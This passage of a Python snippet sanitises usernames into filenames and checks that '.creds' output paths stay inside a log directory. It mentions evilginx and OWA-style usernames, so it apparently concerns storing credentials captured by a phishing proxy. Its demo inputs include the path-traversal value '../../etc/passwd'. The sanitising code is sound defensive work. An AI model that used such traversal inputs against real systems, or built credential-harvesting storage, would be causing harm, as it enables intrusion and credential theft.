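Added example; names and character policy are assumptions, not evilginx code."""
import os
import re

# Anything outside this conservative set (letters, digits, . _ @ -) is replaced.
_UNSAFE = re.compile(r"[^A-Za-z0-9._@-]")


def safe_filename(username, replacement="-", max_len=100):
    """Return a filename-safe version of `username`.

    Both "/" and "\\" fall under _UNSAFE, so "CORP\\jdoe" and "owa/user" become
    "CORP-jdoe" and "owa-user". Leading dots are stripped so ".." or ".hidden" cannot
    become a traversal component or a hidden file.
    """
    name = _UNSAFE.sub(replacement, username)
    name = name.lstrip(".")
    name = name[:max_len]
    return name or "empty"


def creds_path(out_dir, username, suffix=".creds"):
    """Build the output path and, as defence in depth, confirm it stays under out_dir."""
    path = os.path.join(out_dir, safe_filename(username) + suffix)
    base = os.path.realpath(out_dir)
    if os.path.commonpath([base, os.path.realpath(path)]) != base:
        raise ValueError("sanitised path escaped the output directory")
    return path


if __name__ == "__main__":
    for raw in ("jdoe", "CORP\\jdoe", "owa/user", "../../etc/passwd", "..", ""):
        print(repr(raw), "->", creds_path("/tmp/logs", raw))
```

The realpath check is redundant once the sanitiser is correct, but keeping it means a future change to the character policy cannot silently reintroduce traversal.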